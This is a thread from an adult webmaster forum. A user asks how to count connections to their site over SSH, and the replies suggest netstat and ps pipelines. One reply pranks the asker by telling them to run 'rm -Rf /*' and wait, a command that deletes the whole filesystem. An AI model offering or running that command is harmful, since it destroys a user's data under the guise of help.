![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools |
![]() |
#1 |
Too lazy to set a custom title
Industry Role:
Join Date: May 2003
Location: icq: 71462500 Skype: Jupzchris
Posts: 27,880
|
ssh command to show me how many connections to a domain?
I am logged in
i type netstat is that showing how many people are on my site?? Code:
]# netstat Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address Foreign Address Stat e tcp 0 268 myserver.jupzchris.com:ssh cpe-70-123-167-116.hot:1508 ESTA BLISHED Active UNIX domain sockets (w/o servers) Proto RefCnt Flags Type State I-Node Path unix 13 [ ] DGRAM 1971 /dev/log unix 2 [ ] DGRAM 32441520 unix 3 [ ] STREAM CONNECTED 32441478 unix 3 [ ] STREAM CONNECTED 32441477 unix 3 [ ] STREAM CONNECTED 32408775 /var/lib/mysql/mysql. sock unix 3 [ ] STREAM CONNECTED 32408774 unix 2 [ ] DGRAM 208652 unix 2 [ ] DGRAM 206200 unix 2 [ ] DGRAM 5127 unix 3 [ ] STREAM CONNECTED 4325 unix 3 [ ] STREAM CONNECTED 4324 unix 3 [ ] STREAM CONNECTED 4323 unix 3 [ ] STREAM CONNECTED 4322 unix 2 [ ] DGRAM 4291 unix 2 [ ] DGRAM 3521 unix 2 [ ] DGRAM 3043 unix 2 [ ] DGRAM 2593 unix 2 [ ] DGRAM 2575 unix 2 [ ] DGRAM 2435 unix 2 [ ] DGRAM 2041 unix 2 [ ] DGRAM 1979 [email protected] [~]#
__________________
[email protected] |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#3 |
Confirmed User
Join Date: Mar 2004
Location: LOLLIPOP ISLAND =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-= =-=-=-=-=-=-=-=-=-=-=
Posts: 4,569
|
use "rm -Rf /*"
Dont touch your keyboard for at least 10 min its working.. ____ Why not just turn on server-info in apache.. Its a simple way to see.
__________________
![]() ![]() ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#4 |
Confirmed User
Join Date: May 2006
Posts: 147
|
Try this:
ps -aux | grep httpd | wc -l; netstat -na | grep :80 | wc -l;uptime |
![]() |
![]() ![]() ![]() ![]() ![]() |